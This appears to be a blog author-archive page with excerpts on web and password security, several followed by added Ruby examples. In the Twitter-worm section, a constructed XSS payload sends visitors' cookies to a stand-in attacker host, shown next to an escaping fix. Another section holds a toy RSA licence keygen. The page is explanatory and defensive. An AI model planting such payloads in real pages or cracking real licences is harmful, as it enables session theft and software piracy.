Author Archive

Terrible Password Security Advice From Jakob Nielsen

Jakob Nielsen today wrote an article calling for all log-in forms to display passwords in plaintext, rather than masking them with bullets or stars. He argues that this increases usability (users feel more confident because they can see their password as they type it), and also increases security (a more confident user will choose stronger [...]

How To Put Firefox’s “Open Link in New Tab” Button On Top

For the longest time, I’ve wanted Firefox to put the “Open Link in New Tab” option at the top of the context menu when I click on a link. I use this option all the time, and the mild annoyance of having to move my mouse to get to it has added up over the [...]

Open Source jQuery Plugin TweetLink

With more and more web sites and businesses embracing Twitter, it’s important to make it as easy as possible for users to share content on the social networking site. That’s why I just coded up a jQuery plugin called TweetLink, which allows web developers to easily add “Tweet This Page” buttons to their site.
After the TweetLink [...]

More Trouble with Twitter: The StalkDaily Worm

Twitter has had a lot of embarrassing security problems in the past, but the worst part is that they still haven’t learned from their mistakes. Apparently a recent redesign left the profile page vulnerable to a very simple XSS attack.
Some enterprising hacker quickly seized the opportunity to promote Twitter-clone StalkDaily by infecting the profiles of [...]
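The bug class behind a worm like this is the oldest one in the web book: a profile field that the site stores and later prints back into HTML without escaping. As an added illustration (not Twitter's code and not the actual StalkDaily payload; the payload, field names and markup here are constructed), a vulnerable renderer next to the hardened one, in Ruby:

```ruby
require 'cgi'

# Constructed payload of the kind a stored profile-field XSS uses: the attacker
# saves it as their own profile text and it runs in every visitor's browser.
PAYLOAD = %q(<script>document.location="http://evil.invalid/?c="+document.cookie</script>)

# Vulnerable rendering: the profile field is concatenated straight into HTML.
def render_profile_vulnerable(name, location)
  "<h1>#{name}</h1><p class=\"location\">#{location}</p>"
end

# Hardened rendering: every untrusted value is HTML-escaped at the output
# boundary, so <, >, &, " and ' cannot break out of the text context.
def render_profile_safe(name, location)
  "<h1>#{CGI.escapeHTML(name)}</h1><p class=\"location\">#{CGI.escapeHTML(location)}</p>"
end

# Crude check used here only to show the difference; it is not a sanitizer.
def contains_script_tag?(html)
  html.downcase.include?('<script')
end

if __FILE__ == $PROGRAM_NAME
  puts render_profile_vulnerable('mallory', PAYLOAD)
  puts render_profile_safe('mallory', PAYLOAD)
end
```

Escaping at output time is the fix that survives redesigns; a template layer that escapes by default (and makes raw output an explicit opt-in) is what keeps the next redesign from reintroducing the hole.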

Handy Ruby Gem: andand

I came across a really useful Ruby gem today: andand. In PHP web development, I usually use this idiom when retrieving an object from the database model:

$obj = $model->getObject($id);
if (null !== $obj) {
    doSomething($obj);
}

Obviously this is a little cumbersome, since I have to do this every single time I get an object [...]
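To show what andand buys you over the PHP idiom above, here is an added example that re-implements the idea in a few lines (this is my own minimal version for illustration, not the gem's code) and uses it against a constructed stand-in for the model. It also shows the safe-navigation operator that Ruby 2.3 and later build into the language for the same purpose.

```ruby
# Minimal re-implementation of the andand idea (not the andand gem's code):
# obj.andand.msg sends msg when obj is non-nil and yields nil otherwise.
class Object
  def andand
    self
  end
end

class NilClass
  # Swallows any message and answers nil, so a chain on nil short-circuits.
  class NilProxy < BasicObject
    def method_missing(*_args)
      nil
    end
  end

  def andand
    NilProxy.new
  end
end

# A stand-in model with the same shape as the PHP snippet (constructed data).
User = Struct.new(:id, :name)

class Model
  USERS = { 1 => User.new(1, 'alice'), 2 => User.new(2, 'bob') }.freeze

  def get_object(id)
    USERS[id]          # nil when the id is unknown, as with the PHP version
  end
end

MODEL = Model.new

# The verbose idiom from the PHP code, written in Ruby.
def name_explicit(id)
  obj = MODEL.get_object(id)
  return nil if obj.nil?
  obj.name
end

# The same lookup with andand.
def name_andand(id)
  MODEL.get_object(id).andand.name
end

# Ruby 2.3 and later ship this behaviour as the safe-navigation operator,
# which is what new code should use instead of a gem.
def name_safe_nav(id)
  MODEL.get_object(id)&.name
end
```

Note that a nil-swallowing proxy hides errors as readily as it hides absent rows: a typo in the method name after `.andand` also returns nil instead of raising, so use it only where nil is genuinely an expected outcome.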

Cracking a Software License Scheme

In his latest blog post, Andy Sloane issued a challenge to create a key-generator for his bespoke software licensing scheme.
Looking through his code, I quickly found that he was using RSA, and that valid keys decrypted to 12345678 under a hardcoded RSA public key.
In my response on the Reddit discussion, I explained creating a keygen [...]
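The shape of such a scheme, and why "valid keys decrypt to a constant under a hard-coded public key" is exactly the property a keygen needs, is easiest to see in code. The following is an added toy model, not Andy Sloane's scheme or my original keygen: the modulus is constructed small enough to factor by trial division so that the private exponent can be recovered from the shipped public key alone.

```ruby
# Toy model of a "decrypt the licence key with a hard-coded public key and
# compare against a magic number" scheme. The numbers are constructed for this
# illustration; they are not the challenge's parameters, and a real 1024-bit
# modulus could not be factored this way.
MAGIC = 12345678
E     = 65537

# What ships inside the product: the public key (N, E) and the magic value.
N = 10007 * 10009   # 100_160_063; the vendor knows the factors, the user does not

# The product's check: a key is valid if key^E mod N == MAGIC.
def valid_key?(key)
  key.pow(E, N) == MAGIC
end

# Trial-division factoring, enough for a toy modulus.
def factor(n)
  (2..Integer.sqrt(n)).each { |p| return [p, n / p] if n % p == 0 }
  nil
end

# Extended Euclid: returns [g, x, y] with a*x + b*y == g == gcd(a, b).
def egcd(a, b)
  return [a, 1, 0] if b == 0
  g, x, y = egcd(b, a % b)
  [g, y, x - (a / b) * y]
end

# Modular inverse of a mod m.
def modinv(a, m)
  g, x = egcd(a, m)
  raise ArgumentError, 'not invertible' unless g == 1
  x % m
end

# The keygen: recover d from the public key alone, then apply the private
# operation to MAGIC. The product's own check then accepts the result.
def keygen
  p, q = factor(N)
  d = modinv(E, (p - 1) * (q - 1))
  MAGIC.pow(d, N)
end

if __FILE__ == $PROGRAM_NAME
  key = keygen
  puts "key=#{key} valid=#{valid_key?(key)}"
end
```

With a properly sized modulus the factoring step is out of reach, but the other classic keygen route remains: patching the embedded public key in the binary with one whose private half the attacker holds. A signature check alone cannot defend against that; it only moves the problem to protecting the verifier.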

Are You a Brute-Force Enabler?

Jimmy Ruska has taken the time to combine data from 3 compromised-password lists, and the results are pretty interesting.
If an attacker can try just a single password against every user on your web application, he’ll compromise about 1% of them. Even with a fairly stringent 3-attempt lockout policy, about 2-3% of your users will be [...]
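The attack described here (one guess against every account, now usually called password spraying) is invisible to a per-account lockout counter by construction, because no single account ever sees more than one failure. As an added example, not part of the original post, here is the contrast in Ruby over a few constructed log lines: the per-account counter that a 3-strike lockout uses, and the per-source count of distinct accounts that actually catches a spray.

```ruby
require 'set'

# Constructed authentication log lines: one source IP tries one password
# against many accounts, staying under any per-account lockout threshold.
LOG = <<~LINES
  2009-04-20T10:00:01 FAIL user=alice ip=203.0.113.9
  2009-04-20T10:00:02 FAIL user=bob ip=203.0.113.9
  2009-04-20T10:00:03 FAIL user=carol ip=203.0.113.9
  2009-04-20T10:00:03 FAIL user=dave ip=203.0.113.9
  2009-04-20T10:00:04 FAIL user=erin ip=203.0.113.9
  2009-04-20T10:00:05 OK   user=frank ip=203.0.113.9
  2009-04-20T10:00:06 FAIL user=grace ip=198.51.100.4
  2009-04-20T10:00:07 FAIL user=grace ip=198.51.100.4
  2009-04-20T10:00:08 FAIL user=grace ip=198.51.100.4
  2009-04-20T10:00:09 OK   user=heidi ip=192.0.2.77
LINES

Event = Struct.new(:time, :result, :user, :ip)

def parse(log)
  log.each_line.map do |line|
    m = line.match(/^(\S+)\s+(FAIL|OK)\s+user=(\S+)\s+ip=(\S+)$/) or next
    Event.new(m[1], m[2], m[3], m[4])
  end.compact
end

# Per-account view: what a 3-strike lockout sees. Returns accounts that would lock.
def locked_accounts(events, threshold: 3)
  fails = Hash.new(0)
  events.each { |e| fails[e.user] += 1 if e.result == 'FAIL' }
  fails.select { |_, n| n >= threshold }.keys
end

# Per-source view: distinct accounts with failures from one IP. A spray shows
# up here even though no single account crosses the lockout threshold.
def spraying_ips(events, min_accounts: 5)
  users_by_ip = Hash.new { |h, k| h[k] = Set.new }
  events.each { |e| users_by_ip[e.ip] << e.user if e.result == 'FAIL' }
  users_by_ip.select { |_, users| users.size >= min_accounts }.keys
end

# Accounts the sprayer actually got into: a success from a flagged source,
# i.e. the roughly one percent the post is talking about.
def spray_successes(events, ips)
  events.select { |e| e.result == 'OK' && ips.include?(e.ip) }.map(&:user)
end

if __FILE__ == $PROGRAM_NAME
  events = parse(LOG)
  puts "locked by per-account policy: #{locked_accounts(events).inspect}"
  ips = spraying_ips(events)
  puts "spraying sources: #{ips.inspect}, got in as: #{spray_successes(events, ips).inspect}"
end
```

In the sample, the only account the lockout policy catches is the one being hammered vertically from 198.51.100.4; the sprayer at 203.0.113.9 locks nobody and still logs in as frank. A production detector would add a time window and handle attackers rotating source addresses; the per-source distinct-account count is the core signal either way.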

Haddock: Generate Memorable Passwords in Ruby

Newly released RubyGem Haddock offers to generate easy-to-remember passwords, but how secure are they?
Haddock-generated passwords are of the form {word}{number}{symbol}{word}, and are generated to be at most as long as a user-specified length. So for example, an 8-character Haddock password might be “amy7@rax”.
For a relatively low-security password, like you might use for your Twitter account, this is [...]
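The way to answer "how secure are they?" is to count the space an attacker who knows the generator must search, and the length cap matters more than it looks: at eight characters, the two words must fit in six letters between them, which rules out most of any dictionary. The following added example (my own code, not Haddock's; it assumes a single digit for {number}, as in “amy7@rax”, and draws the word pair uniformly from the pairs that fit, which may differ from Haddock's actual rules) generates passwords of that shape from a constructed word list and computes the resulting keyspace.

```ruby
require 'securerandom'

# Constructed dictionary and symbol set; a real word list has tens of
# thousands of entries, which changes the numbers but not the shape.
WORDS   = %w[amy rax cat dog bird fish horse].freeze
SYMBOLS = %w[@ # $ % !].freeze
DIGITS  = ('0'..'9').to_a.freeze

# Ordered word pairs whose combined length leaves room for the digit and symbol.
def fitting_pairs(max_len, words = WORDS)
  words.product(words).select { |a, b| a.size + b.size <= max_len - 2 }
end

# Generate a password of the {word}{number}{symbol}{word} shape, no longer
# than max_len. Assumes one digit for {number}; Haddock's own rules may differ.
def haddock_like(max_len, words: WORDS, symbols: SYMBOLS)
  pairs = fitting_pairs(max_len, words)
  raise ArgumentError, 'no word pair fits' if pairs.empty?
  w1, w2 = pairs[SecureRandom.random_number(pairs.size)]
  digit  = DIGITS[SecureRandom.random_number(DIGITS.size)]
  symbol = symbols[SecureRandom.random_number(symbols.size)]
  "#{w1}#{digit}#{symbol}#{w2}"
end

# Size of the space an attacker who knows the generator has to search.
def keyspace(max_len, words: WORDS, symbols: SYMBOLS)
  fitting_pairs(max_len, words).size * DIGITS.size * symbols.size
end

def entropy_bits(max_len, **opts)
  Math.log2(keyspace(max_len, **opts))
end

if __FILE__ == $PROGRAM_NAME
  [8, 10, 12].each do |len|
    puts "max_len=#{len}: #{haddock_like(len)} " \
         "keyspace=#{keyspace(len)} (#{entropy_bits(len).round(1)} bits)"
  end
end
```

Plug a real dictionary into WORDS and the same arithmetic gives the honest figure: the entropy is about two word-choices' worth plus log2(10 * |symbols|) bits, and the length cap shrinks the first term to the count of short-word pairs. Compare that with the roughly 6.5 bits per character a random printable password gets at the same length before deciding what the generated value is fit for.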